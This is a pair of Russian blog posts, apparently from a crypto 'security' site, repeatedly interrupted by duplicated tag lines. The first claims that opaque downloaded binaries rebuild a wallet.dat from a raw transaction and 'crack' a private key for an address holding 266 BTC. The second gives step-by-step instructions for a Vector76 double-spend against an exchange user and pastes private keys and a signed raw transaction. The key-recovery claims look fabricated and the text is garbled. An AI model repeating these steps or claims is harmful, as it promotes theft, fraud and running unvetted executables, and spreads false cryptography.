Скачаем и установим исходный код откроем терминал и запустим команду:

git clone https://github.com/smartiden/Broadcast-Bitcoin-Transaction.g...

Каталог:

cd Broadcast-Bitcoin-Transaction

Установим три важные библиотеки:

Запустим команду:

pip install -r requirements.txt

Откроем в Notepad++ основной файл и внесем небольшие изменение в коде Python Script: main.py

Запустим команду:

python main.py

Уязвимая транзакция создана!

Откроем файл RawTX в каталоге:

Порядок выполнения действий на видео:

Как нам известно из prompt ответов модуля BitcoinChatGPT Jacobian Curve Vulnerability Algorithm может быть использован для решения сложных криптографических задач.

Smart Transformers

Применим машинное обучение Smart Transformers, интегрируем блокнот Google Colab с Pytorch, TensorFlow, JAX и с помощью полученных данных уязвимой Raw транзакцией для Биткоин Адреса: 15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2 создадим незащищённый файл wallet.dat из предложенного выбора всех существующих алгоритмов от SMART_IDENTIFY. После выполним Padding Oracle Attack на новосозданный файл: wallet.dat для расшифровки пароля в исходный бинарный формат с целью получение и извлечения приватного ключа из программной консоли Bitcoin Core используя при этом стандартную команду: dumpprivkey 15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2

Откроем новый блокнот Google Colab по ссылке:

https://colab.research.google.com/#create=true

Клонируем репозиторий Smart Transformers

!git clone https://github.com/smartiden/Smart-Transformers.git

cd Smart-Transformers/

Манипуляции с координатами кривой Jacobian исследование уязвимости поддельной подписи с помощью декодируемого файла Биткоин Кошелька Биткоины, Криптовалюта, Хакеры, Заработок в интернете, Заработок, Трейдинг, Арбитраж криптовалюты, Информационная безопасность, Чат-бот, Финансы, Видео, YouTube, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Установим все необходимые пакеты и библиотеки:

!sudo apt-get update !sudo apt install libtool !sudo apt-get install g++ !sudo apt-get install libgmp3-dev libmpfr-dev !chmod +x Generic_Algorithms !./Generic_Algorithms !pip3 install transformers from transformers import AutoModelForCausalLM, AutoTokenizer model_name = "microsoft/DialoGPT-medium" tokenizer = AutoTokenizer.from_pretrained(model_name) model = AutoModelForCausalLM.from_pretrained(model_name) model = model.cpu()

Манипуляции с координатами кривой Jacobian исследование уязвимости поддельной подписи с помощью декодируемого файла Биткоин Кошелька Биткоины, Криптовалюта, Хакеры, Заработок в интернете, Заработок, Трейдинг, Арбитраж криптовалюты, Информационная безопасность, Чат-бот, Финансы, Видео, YouTube, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост
Манипуляции с координатами кривой Jacobian исследование уязвимости поддельной подписи с помощью декодируемого файла Биткоин Кошелька Биткоины, Криптовалюта, Хакеры, Заработок в интернете, Заработок, Трейдинг, Арбитраж криптовалюты, Информационная безопасность, Чат-бот, Финансы, Видео, YouTube, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Команда:

ls -S

Манипуляции с координатами кривой Jacobian исследование уязвимости поддельной подписи с помощью декодируемого файла Биткоин Кошелька Биткоины, Криптовалюта, Хакеры, Заработок в интернете, Заработок, Трейдинг, Арбитраж криптовалюты, Информационная безопасность, Чат-бот, Финансы, Видео, YouTube, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Добавим нашу уязвимую Raw транзакцию в текстовый документ: RawTX.txt для этого воспользуемся утилитой echo

!cat RawTX.txt

Теперь, чтобы получить точный алгоритм и метод для криптоанализы нам необходимо идентифицировать уязвимый RawTX с помощью утилиты SMART_IDENTIFY.

Запустим команду:

!./SMART_IDENTIFY

В результате мы получаем метод Jacobian_Curve_Algorithm, в ранних исследованиях тоже самое идентифицировал модуль BitcoinChatGPT.

################################################# Jacobian_Curve_Algorithm #################################################

Манипуляции с координатами кривой Jacobian исследование уязвимости поддельной подписи с помощью декодируемого файла Биткоин Кошелька Биткоины, Криптовалюта, Хакеры, Заработок в интернете, Заработок, Трейдинг, Арбитраж криптовалюты, Информационная безопасность, Чат-бот, Финансы, Видео, YouTube, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Откроем каталог:

Манипуляции с координатами кривой Jacobian исследование уязвимости поддельной подписи с помощью декодируемого файла Биткоин Кошелька Биткоины, Криптовалюта, Хакеры, Заработок в интернете, Заработок, Трейдинг, Арбитраж криптовалюты, Информационная безопасность, Чат-бот, Финансы, Видео, YouTube, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Запустим процесс создание файла wallet.dat для этого используем идентифицированные данные уязвимой Raw транзакции в файле: RawTX.txt для процесса применим утилиту Jacobian_Curve_Algorithm

Запустим команду:

!./Jacobian_Curve_Algorithm -o RawTX.txt -s wallet.dat

Откроем в левой панели Google Colab каталог и видим файл: wallet.dat Успешно создан!

Манипуляции с координатами кривой Jacobian исследование уязвимости поддельной подписи с помощью декодируемого файла Биткоин Кошелька Биткоины, Криптовалюта, Хакеры, Заработок в интернете, Заработок, Трейдинг, Арбитраж криптовалюты, Информационная безопасность, Чат-бот, Финансы, Видео, YouTube, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Download and Install Bitcoin Core 0.18.0 https://bitcoincore.org/bin/bitcoin-core-0.18.0

Откроем консоль и запустим команду:

getaddressinfo 15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2

Мы видим что файл: wallet.dat принадлежит Биткоин Адресу: 15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2

Файл: wallet.dat зашифрован паролем!

Запустим команду для проверки приватного ключа:

dumpprivkey 15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2

Мы видим предупреждение: Error: Please enter the wallet passphrase with walletpassphrase first. (code -13)

Padding Oracle Attack

Манипуляции с координатами кривой Jacobian исследование уязвимости поддельной подписи с помощью декодируемого файла Биткоин Кошелька Биткоины, Криптовалюта, Хакеры, Заработок в интернете, Заработок, Трейдинг, Арбитраж криптовалюты, Информационная безопасность, Чат-бот, Финансы, Видео, YouTube, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Воспользуемся методом Padding Oracle Attack на Wallet.dat и расшифруем пароль для доступа в бинарный формат пароля.

dumpprivkey 15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2

Манипуляции с координатами кривой Jacobian исследование уязвимости поддельной подписи с помощью декодируемого файла Биткоин Кошелька Биткоины, Криптовалюта, Хакеры, Заработок в интернете, Заработок, Трейдинг, Арбитраж криптовалюты, Информационная безопасность, Чат-бот, Финансы, Видео, YouTube, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Private Key Information:

5KKUoqxvJjUK8zM2jaeMMpKMhzUM9EBkaFT6LedAjhrQfkTs1BP

Манипуляции с координатами кривой Jacobian исследование уязвимости поддельной подписи с помощью декодируемого файла Биткоин Кошелька Биткоины, Криптовалюта, Хакеры, Заработок в интернете, Заработок, Трейдинг, Арбитраж криптовалюты, Информационная безопасность, Чат-бот, Финансы, Видео, YouTube, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Bitcoin Address Information:

Balance: 266.03138481 BTC

Манипуляции с координатами кривой Jacobian исследование уязвимости поддельной подписи с помощью декодируемого файла Биткоин Кошелька Биткоины, Криптовалюта, Хакеры, Заработок в интернете, Заработок, Трейдинг, Арбитраж криптовалюты, Информационная безопасность, Чат-бот, Финансы, Видео, YouTube, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

https://www.coinbase.com/converter/btc/usd

Установим библиотеку Bitcoin

!pip3 install bitcoin

Запустим код для проверки соответствие Биткоин Адреса:

Манипуляции с координатами кривой Jacobian исследование уязвимости поддельной подписи с помощью декодируемого файла Биткоин Кошелька Биткоины, Криптовалюта, Хакеры, Заработок в интернете, Заработок, Трейдинг, Арбитраж криптовалюты, Информационная безопасность, Чат-бот, Финансы, Видео, YouTube, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

__________________________________________________ Private Key WIF: 5KKUoqxvJjUK8zM2jaeMMpKMhzUM9EBkaFT6LedAjhrQfkTs1BP Bitcoin Address: 15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2 total_received = 266.03138481 Bitcoin __________________________________________________

Все верно! Приватный ключ соответствует Биткоин Кошельку.

Откроем bitaddress и проверим:

ADDR: 15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2 WIF: 5KKUoqxvJjUK8zM2jaeMMpKMhzUM9EBkaFT6LedAjhrQfkTs1BP HEX: C5FBD161D334BA9BBC199BD9A427F05A46AACFABFBB3BC1BFF9D227E418D76D9

Манипуляции с координатами кривой Jacobian исследование уязвимости поддельной подписи с помощью декодируемого файла Биткоин Кошелька Биткоины, Криптовалюта, Хакеры, Заработок в интернете, Заработок, Трейдинг, Арбитраж криптовалюты, Информационная безопасность, Чат-бот, Финансы, Видео, YouTube, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Заключение и меры по смягчению угрозы:

Для защиты от угроз, связанных с уязвимостью Jacobian Curve, пользователям необходимо предпринять следующие шаги:

  1. Обновление программного обеспечения: Регулярное обновление криптовалютных кошельков до версий, устраняющих уязвимости, критически важно для обеспечения безопасности.

  2. Улучшение механизмов проверки подписей: Усиленная валидация входных данных и обработка ошибок помогут предотвратить создание поддельных подписей и защитить приватные ключи пользователей.

  3. Мониторинг сетевой активности: Постоянный анализ состояния сети и выявление подозрительных транзакций на ранних этапах позволяют оперативно реагировать на попытки эксплуатации уязвимостей.

  4. Применение многофакторной аутентификации: Внедрение дополнительных криптографических методов защиты значительно повысит безопасность.

Чтобы предотвратить возможные атаки, связанные с уязвимостью Jacobian Curve, пользователям Bitcoin настоятельно рекомендуется обновить программное обеспечение своих кошельков до последних версий, которые устраняют эту уязвимость. Регулярные обновления программного обеспечения, внедрение систем обнаружения аномалий и повышение осведомленности пользователей о возможных угрозах помогут сохранить целостность и безопасность криптовалютных систем.

Уязвимость алгоритма Jacobian Curve представляет собой значительную угрозу для безопасности криптовалютных транзакций и целостности блокчейна. Для минимизации рисков пользователи должны регулярно обновлять программное обеспечение, применять строгие меры безопасности и проводить постоянный мониторинг состояния сети. Эти меры помогут сохранить безопасность и устойчивость криптовалютных систем, защищая пользователей от потенциальных угроз и финансовых потерь.

References:

  1. Jacobians of Curves Abelian Varieties: 10/10/03 notes by W. Stein

  2. Jacobian of special singular curves KUBRA NARI AND ENVER OZDEMIR

  3. On the Jacobian Varieties of Hyperelliptic Curves over Fields of Characteristic p > 2 NORIKO YUI Received October 15, 1977

  4. Jacobian Coordinates on Genus 2 Curves Huseyin Hisil & Craig Costello Yasar University, Izmir, Turkey

  5. Jacobians of Curves of Genus One Harvard University Cambridge, Massachusetts April, 1999

  6. Jacobian curve of singular foliations Nuria Corral Article à paraître, mis en ligne le 3 juillet 2024.

  7. AN ADDITION ALGORITHM ON THE JACOBIAN VARIETIES OF CURVES (FOR APPLICATIONS TO PUBLIC KEY CRYPTOSYSTEM) S. ARITA, S. MIURA, AND T. SEKIGUCHI

  8. THE JACOBIAN AND FORMAL GROUP OF A CURVE OF GENUS 2 OVER AN ARBITRARY GROUND FIELD E. V. Flynn, Mathematical Institute, University of Oxford

  9. On the genus of curves in a Jacobian variety VALERIA ORNELLA MARCUCCI Mathematics Subject Classification (2010)

  10. LOCAL ARITHMETIC OF CURVES AND JACOBIANS P. Allen, F. Calegari, A. Caraiani, T. Gee, D. Helm, B. Le Hung, J. Newton, S. Scholze, R. Taylor, and J. Thorne, Potential automorphy

  11. Compactified Jacobians of nodal curves Lucia Caporaso Expanded notes for a minicourse given at the Istituto Sup

  12. Note on curves in a jacobian Compositio Mathematica, tome 88, no 3 (1993)

  13. Arithmetic on Jacobians of algebraic curves Giulio Di Piazza Damien Robert

  14. From the curve to its Jacobian and back Christophe Ritzenthaler Institut de Mathématiques de Luminy, CNRS Montréal

  15. Generalized Jacobians I Caleb Ji Background from algebraic geometry

  16. Hyperelliptic Curves and their Jacobians Benjamin Smith Isogeny school, online, 2021 Inria + École polytechnique, France

  17. Jacobian curves for normal complex surfaces Fran¸coise Michel Mathematics Subject Classification 2000

  18. THE JACOBIAN OF A RIEMANN SURFACE DONU ARAPURA Arapura, Riemann’s inequality and Riemann-Roch

  19. A curve and its abstract Jacobian Boris Zilber University of Oxford August 22, 2012

  20. Jacobians of Genus One Curves Sang Yook An and Seog Young Kim The University of Arizona

  21. JACOBIANS CURVILINEAR COORDINATES Created by T. Madas

  22. A GEOMETRIC APPROACH TO THE TWO-DIMENSIONAL JACOBIAN CONJECTURE ALEXANDER BORISOV

  23. Jacobian Varieties J.S. Milne June 12, 2021

  24. LOCAL ARITHMETIC OF CURVES AND JACOBIANS School of Mathematics and Statistics, University of Glasgow, University Place, Glasgow

  25. Notes on Jacobian varieties: a brief survey Juliana Coelho (UFF) March 28, 2017

  26. Fast Jacobian arithmetic for hyperelliptic curves of genus 3 Andrew V. Sutherland

  27. The Jacobian of a Transformation Proceedings of the Thirteenth Algorithmic Number Theory Symposium

  28. SEMINAR ON ALGEBRAIC GEOMETRY: “JACOBIANS OF CURVES” Organizers: Peter Scholze, Johannes Anschutz

  29. EQUATIONS FOR THE JACOBIAN OF A HYPERELLIPTIC CURVE PAUL VAN WAMELEN

  30. Comparatively Study of ECC and Jacobian Elliptic Curve Cryptography Anagha P. Zele , Avinash P. Wadhe

  31. THE RANK OF THE JACOBIAN OF MODULAR CURVES: ANALYTIC METHODS BY EMMANUEL KOWALSKI

  32. Space filling curves in their Jacobian Autor Thijs Limbeek Supervisors Prof. Dr. Ben Moonen Dr. Arne Smeets November 24, 2020

Данный материал создан для портала CRYPTO DEEP TECH для обеспечения финансовой безопасности данных и криптографии на эллиптических кривых secp256k1 против слабых подписей ECDSA в криптовалюте BITCOIN. Создатели программного обеспечения не несут ответственность за использование материалов.

Исходный код

Telegram: https://t.me/cryptodeeptech

Видеоматериал: https://youtu.be/qf6u85wGwNw

Video tutorial: https://dzen.ru/video/watch/66119078be267c07401d9e4c

Источник: https://cryptodeep.ru/jacobian-curve-algorithm-vulnerability

Показать полностью 20 4
1

Vector76 Attack: исследование и предотвращение угроз для сети Биткоин детальный криптоанализ на основе реальных данных

С развитием криптовалютных технологий и увеличением популярности Bitcoin, на рынке появились различные программные обеспечения, такие как Flash Bitcoin Software и Fake BTC Software. Эти программы могут привести к катастрофическим последствиям на экосистему Bitcoin. В данной статье мы рассмотрим на примере реальных данных, что представляют собой эти программные обеспечения, как они работают и какое влияние оказывают на криптовалюту Bitcoin, а также как эти различные программные обеспечения используют механизм Vector76 Attack, что представляет собой разновидность атаки двойной траты (double-spending attack), при которой злоумышленник пытается провести одну и ту же транзакцию дважды. В отличие от классической атаки двойной траты, Vector76 использует уязвимости в механизмах подтверждения транзакций и временные задержки в распространении блоков по сети Биткоин.

В атаке Vector76 злоумышленник сначала создаёт две транзакции: одну для отправки средств на свой Биткоин адрес и другую для отправки тех же средств на Биткоин адрес продавца. Затем он пытается убедить продавца принять неподтверждённую транзакцию, одновременно распространяя другую транзакцию в сети. Если злоумышленнику удаётся провести свою транзакцию быстрее, чем продавец получит подтверждение, то средства будут отправлены на адрес злоумышленника, а не продавца.

Программное обеспечение

Программные обеспечение облегчают для злоумышленника интервальное использование временного окна между подтверждением транзакции в локальной сети и её распространением по всей сети Bitcoin. Злоумышленник создает две транзакции: одну, которая отправляется в локальную сеть, и другую которая отправляется в основную сеть. Если злоумышленник успевает провести первую транзакцию до того, как вторая будет подтверждена, он может обмануть получателя, заставив его поверить в подлинность первой транзакции. Рассмотрим самые известные программные обеспечение которые применяют для интервального использование временного окна для успешного подтверждением транзакции Биткоина.

Flash Bitcoin Software

Flash Bitcoin Software представляет собой программное обеспечение, которое позволяет пользователям временно увеличивать баланс своего Bitcoin-кошелька. Это достигается за счет создания транзакций, которые выглядят легитимными, но на самом деле не подтверждаются в блокчейне. Такие транзакции могут быть использованы для обмана пользователей и сервисов, принимающих Bitcoin.

Fake BTC Software

Fake BTC Software в свою очередь, предназначено для создания поддельных Bitcoin-транзакций. Эти транзакции могут быть использованы для мошенничества, так как они создают видимость перевода средств, хотя на самом деле никакие средства не передаются. Это программное обеспечение может быть использовано для обмана продавцов и покупателей в криптовалютных сделках.

Dockeyhunt Vector76 Attack

Dockeyhunt Vector76 Attack предназначено для создания двух или несколько Raw транзакции с цель подтверждение через Broadcast Bitcoin Transaction для сценарии двойной траты одним и тем же Биткоином. Суть атаки заключается в том, что злоумышленник отправляет одну и ту же транзакцию в две разные части сети, создавая временное расхождение в блокчейне Bitcoin. Это программное обеспечение также может быть использовано для обмана продавцов и покупателей в криптовалютных сделках и операциях, где принимают различные токены и различные известные криптовалюты Bitcoin, Etherium и.т.д

CGMiner и BFGMiner

CGMiner и BFGMiner эти программные обеспечение предназначены для майнинга могут быть использованы для реализации атак типа Selfish Mining, так как они позволяют майнерам контролировать процесс добычи блоков.

Wireshark

Wireshark – это программное обеспечение для анализа сети и может быть использован для анализа сетевого трафика и реализации Sybil Attack и Eclipse Attack . Мошенники могут использовать модифицированные версии клиента Bitcoin Core для проведения различных атак на консенсусный механизм.

BlockSci

BlockSci – это программное обеспечение позволяет анализировать блокчейн и может быть использован для проведения анализа транзакций и Dusting Attack (DUST ATTACK).

Влияние атаки на сеть Bitcoin

Vector76 Attack была впервые описана в 2011 году и представляет собой комбинацию атак Finney и Race. Атака использует уязвимости в процессе подтверждения транзакций в сети Bitcoin. Основная идея заключается в том, чтобы создать две конфликтующие транзакции и провести их через разные узлы сети, что позволяет злоумышленнику обмануть получателя и провести двойное расходование.

В Race Attack злоумышленник пытается провести две транзакции одновременно, одну из которых он пытается отменить.

В Finney Attack злоумышленник предварительно майнит блок с транзакцией, а затем пытается провести другую транзакцию с теми же монетами.

В Vector76 Attack злоумышленник использует элементы обеих атак для создания двойного расходования (double spending).

Атака Vector76 может иметь серьезные последствия для сети Bitcoin. Она подрывает доверие к системе, так как пользователи могут потерять средства из-за двойного расходования. Кроме того, атака может вызвать задержки в подтверждении транзакций и увеличить нагрузку на сеть.

Этапы атаки:

  1. Создание двух транзакций: Злоумышленник создает две транзакции с одинаковой суммой, но разными получателями. Одна транзакция отправляется в сеть, а другая удерживается в изолированной части сети Bitcoin.

  2. Отправка первой транзакции: Первая транзакция отправляется в локальную сеть, где она быстро подтверждается.

  3. Отправка второй транзакции: Вторая транзакция отправляется в основную сеть Bitcoin.

  4. Подтверждение первой транзакции: Получатель первой транзакции считает её подлинной и предоставляет товар или услугу.

  5. Подтверждение второй транзакции: Вторая транзакция подтверждается в основной сети, и первая транзакция становится недействительной.

  6. Конфликт и двойное расходование: В результате возникает конфликт, и одна из транзакций может быть включена в блокчейн, что приводит к двойному расходованию.

  7. Слияние сетей: Когда изолированная часть сети сливается с основной, возникает конфликт, и одна из транзакций аннулируется.

Механизмы обнаружения и предотвращения Vector76 Attack:

Для защиты сети Bitcoin от атак типа Vector76 используются различные механизмы обнаружения и предотвращения атак, а также необходимо внедрить эффективные алгоритмы и системы для обнаружения подозрительных транзакций. Рассмотрим несколько подходов:

  1. Анализ блоков и транзакций: Майнинговое ПО и узлы сети анализируют блоки и транзакции на предмет конфликтов и аномалий.

  2. Увеличение количества подтверждений: Рекомендуется ждать большее количество подтверждений (например, 6 и более) перед тем, как считать транзакцию окончательно подтвержденной. Увеличение времени ожидания до подтверждения транзакции может снизить вероятность успешной атаки.

  3. Использование алгоритмов машинного обучения: Современные методы машинного обучения могут быть использованы для обнаружения подозрительных паттернов в транзакциях и блоках.

  4. Мониторинг Сети: Использование специализированных программ для мониторинга сети на предмет подозрительных транзакций и поведения.

  5. Многоуровневое подтверждение: Использование нескольких уровней подтверждения транзакций может повысить безопасность.

  6. Анализ аномалий: Внедрение систем анализа аномалий для выявления подозрительных транзакций и цепочек блоков.

  7. Обновление протоколов: Регулярное обновление протоколов безопасности и внедрение новых методов защиты может повысить устойчивость сети к атакам.

  8. Усиление консенсусного механизма: Внедрение дополнительных проверок и подтверждений для транзакций, что усложнит проведение атак.

Распространение альтернативного блока для проведения Vector76 Attack:

  1. Создание двух конфликтующих транзакций: Злоумышленник создает две транзакции, использующие одни и те же входы, но с разными получателями.

  2. Распространение первой транзакции: Первая транзакция отправляется в сеть и включается в блок, который майнеры начинают подтверждать.

  3. Создание альтернативного блока: Злоумышленник использует собственное майнинговое ПО для создания альтернативного блока, содержащего вторую транзакцию.

  4. Распространение альтернативного блока: В момент, когда первая транзакция уже получила несколько подтверждений, злоумышленник распространяет альтернативный блок, который может быть принят сетью, если он содержит большее количество подтверждений.

Структура Vector76 Attack:

  1. Подготовка: Злоумышленник создает две транзакции: одну для жертвы (Т1) и одну для себя (Т2).

  2. Майнинг блока: Злоумышленник майнит блок, включающий Т2, но не публикует его.

  3. Проведение Т1: Злоумышленник отправляет Т1 в сеть, и жертва принимает ее после одного подтверждения.

  4. Публикация блока: Злоумышленник публикует блок с Т2, который отменяет Т1.

Vector76 Attack: исследование и предотвращение угроз для сети Биткоин детальный криптоанализ на основе реальных данных Биткоины, Криптовалюта, Арбитраж криптовалюты, Заработок в интернете, Заработок, Видео, YouTube, Гифка, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Практическая часть

Рассмотрим пример применение данной атаки с использованием программного обеспечение Dockeyhunt Vector76 Attack

Скачаем программное обеспечение из официального сайта: www.dockeyhunt.com

Vector76 Attack: исследование и предотвращение угроз для сети Биткоин детальный криптоанализ на основе реальных данных Биткоины, Криптовалюта, Арбитраж криптовалюты, Заработок в интернете, Заработок, Видео, YouTube, Гифка, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Установим все необходимые пакеты и библиотеки запустим файл setup.exe

Vector76 Attack: исследование и предотвращение угроз для сети Биткоин детальный криптоанализ на основе реальных данных Биткоины, Криптовалюта, Арбитраж криптовалюты, Заработок в интернете, Заработок, Видео, YouTube, Гифка, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Для проведение успешной атаки нам очень важно создать вторую транзакции (для себя T2) для этого заранее необходимо подготовить Биткоин Кошелек куда мы отправим все наши монеты BTC для дальнейшего хранение в холодном кошельке. Откроем папку и запустим Cold Bitcoin Wallet.exe для генерации нового Биткоин Адреса

Vector76 Attack: исследование и предотвращение угроз для сети Биткоин детальный криптоанализ на основе реальных данных Биткоины, Криптовалюта, Арбитраж криптовалюты, Заработок в интернете, Заработок, Видео, YouTube, Гифка, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Нажимаем Generate Address

Vector76 Attack: исследование и предотвращение угроз для сети Биткоин детальный криптоанализ на основе реальных данных Биткоины, Криптовалюта, Арбитраж криптовалюты, Заработок в интернете, Заработок, Видео, YouTube, Гифка, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Данные нашего нового Биткоин Адреса для дальнейшего хранение в холодном кошельке.

Cold Bitcoin Wallet: Private Key HEX: 7b774f968a0eff26bb645fa91830a17a749e685ca4fab58b98bc03fd6a48405c Private Key WIF: 5JkfMchWKeVh5nUmbTHPhFTpMPmWjn5a9JtrR8iBQqPCCmonapz Private Key WIF compressed: L1MiHzZnRJVdv7jZq51MAeqN11VUFoyBHfys7X2kxCYxSxT9GWRx Public Key: 04addd5a1ced91a6364c486cbc95cde195108657d1eabb86bf97e5dfa3f099b2ba2b7c42c09f8d7d12c6f68a4d1750ac6abbf1379802b9501d9cc1c51b6dcbc87d Public Key compressed: 03addd5a1ced91a6364c486cbc95cde195108657d1eabb86bf97e5dfa3f099b2ba Public Address 1: 1KivXGdoDVPZCZLHpAe8rCztEirdrWuR4Y Public Address 1 compressed: 1qqQcZbZNvsZoF5x3VcnEcJbzPeXncfKq Public Address 3: 36QRQhDUdaufqTJYfgV76CTor6Nix8Zvz3 Public Address bc1 P2WPKH: bc1qpy79lkrlls0jhva93llvq6tkchrkp5zfgq5ned Public Address bc1 P2WSH: bc1q3j88twpmde2rwz5tnecdezxsxtxje0cswfjkcfcckq3mx4d3hm2stuw0ss

Теперь устанавливаем связь с получателем в нашем случаем псевдополучателем является пользователь криптобиржи Huobi

Биткоин Адрес псевдополучателя:

Vector76 Attack: исследование и предотвращение угроз для сети Биткоин детальный криптоанализ на основе реальных данных Биткоины, Криптовалюта, Арбитраж криптовалюты, Заработок в интернете, Заработок, Видео, YouTube, Гифка, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

https://bitinfocharts.com/bitcoin/address/143gLvWYUojXaWZRrxquRKpVNTkhmr415B

Vector76 Attack: исследование и предотвращение угроз для сети Биткоин детальный криптоанализ на основе реальных данных Биткоины, Криптовалюта, Арбитраж криптовалюты, Заработок в интернете, Заработок, Видео, YouTube, Гифка, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Создание Raw транзакции T1 (жертва)

Псевдополучатель (жертва) является пользователям криптобиржи Huobi и ожидает от отправителя (злоумышленник) сумму в размере: 1.17506256 BTC (в криптовалюте Bitcoin)

Биткоин Кошелек отправителя на сумму: 1.17521256 BTC

https://btc1.trezor.io/address/1888dvSYUx23z2NF79NyCaYQ8dxcWCjHDz

Откроем новый блокнот в Google Colab: https://colab.research.google.com

Клонируем репозиторий Broadcast-Bitcoin-Transaction

!git clone https://github.com/smartiden/Broadcast-Bitcoin-Transaction.g...

cd Broadcast-Bitcoin-Transaction/

ls

Запустим Python скрипт bitcoin_info.py (для проверки Биткоин Адреса отправителя)

!python3 bitcoin_info.py

1888dvSYUx23z2NF79NyCaYQ8dxcWCjHDz

Vector76 Attack: исследование и предотвращение угроз для сети Биткоин детальный криптоанализ на основе реальных данных Биткоины, Криптовалюта, Арбитраж криптовалюты, Заработок в интернете, Заработок, Видео, YouTube, Гифка, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Для создание Raw транзакции T1 нам понадобится скопировать от Биткоин Адреса: 1888dvSYUx23z2NF79NyCaYQ8dxcWCjHDz UTXO (Unspent Transaction Output) последний TXID как выход неизрасходованных транзакций для кошелька отправителя.

https://btc1.trezor.io/tx/3141bd1a32ac5e5b1a0de837faceccbc78f80f277c060855eab23be0fbe6e861

TXID: 3141bd1a32ac5e5b1a0de837faceccbc78f80f277c060855eab23be0fbe6e861

Вернемся в корневой каталог и запустим программное обеспечение Dockeyhunt Vector76 Attack

Vector76 Attack: исследование и предотвращение угроз для сети Биткоин детальный криптоанализ на основе реальных данных Биткоины, Криптовалюта, Арбитраж криптовалюты, Заработок в интернете, Заработок, Видео, YouTube, Гифка, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Опция:

При создание транзакции нам необходимо подписать цифровую подпись алгоритмом ECDSA вставим в поле приватный ключ отправителя Биткоин Кошелька: 1888dvSYUx23z2NF79NyCaYQ8dxcWCjHDz (для проверки мы можем воспользоваться bitaddress)

Private Key: KwoqiXXrWkurxSazHJtmxKstB7g4HX247q7JoKcFDtHpFujKNSiD

Скопируем TXID: 3141bd1a32ac5e5b1a0de837faceccbc78f80f277c060855eab23be0fbe6e861 и вставим в поле это необходимо для того чтобы была полная проверка транзакций для всех узлов сети Биткоин, так как все входы транзакции являются действительными (это очень важно и необходимо для проведение успешной атаки Vector76 с целью чтобы монеты BTC отправителя не были потрачены заранее). UTXO позволяет более эффективно обрабатывать транзакции, так как каждый выход транзакции может быть использован только один раз (это упрощает управление состоянием Биткоин сети и уменьшает сложность проверки Raw транзакций).

Prev TXID: 3141bd1a32ac5e5b1a0de837faceccbc78f80f277c060855eab23be0fbe6e861

Скопируем Биткоин Адрес псевдополучателя криптобиржи Huobi: 143gLvWYUojXaWZRrxquRKpVNTkhmr415B и вставим в поле.

Send Address: 143gLvWYUojXaWZRrxquRKpVNTkhmr415B

Скопируем общую сумму Биткоин монет и вставим в поле (для данного отправителя это сумма составляет: 1.17521256 BTC сумму необходимо указать в Satoshi в размере: 117521256)

Total Received: 1.17521256 BTC (117521256 sat/vByte)

Укажем собственную сумму в размере: 15000 sat/vByte это сумма является комиссий, для процесса обработки транзакций майнером. В Биткоине, когда мы отправляем транзакцию, мы платим комиссию майнерам за включение наше созданное Raw транзакции в блокчейн (эта комиссии стимулируют майнеров обрабатывать и подтверждать транзакции).

Fee: 0.00015000 BTC (15000 sat/vByte)

Укажем сумму для отправки монет BTC в нашем случае при выщите с общей суммы 117521256 sat/vByte и размера комиссии: 15000 sat/vByte сумма для отправки будет составлять в Satoshi: 117506256

Sent: 1.17506256 BTC (117506256 sat/vByte)

После того как мы добавили все опции нажимаем Create Transaction

Vector76 Attack: исследование и предотвращение угроз для сети Биткоин детальный криптоанализ на основе реальных данных Биткоины, Криптовалюта, Арбитраж криптовалюты, Заработок в интернете, Заработок, Видео, YouTube, Гифка, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Результат:

Your Bitcoin Address: 1888dvSYUx23z2NF79NyCaYQ8dxcWCjHDz

Bitcoin Address for sending BTC: 143gLvWYUojXaWZRrxquRKpVNTkhmr415B

Bitcoin Transaction RawTX: 010000000161e8e6fbe03bb2ea5508067c270ff878bccccefa37e80d1a5b5eac321abd4131000000006b483045022100dff55be52be07900dd4d2d04473c93249ca78e37955e466437c26f06322f01bc02205ed04a2a4201e8c2b3035de7edfa972e1f7da57dbcca3eaa4fbd4db4cd8ad507012102650afad13f8fb85925ba6765dc5416bad623cdfce3f104191964253a12ed0cddffffffff01d0000107000000001976a914216a0d339ab6ddc696b1b239b9b65810c0bf73d588ac00000000

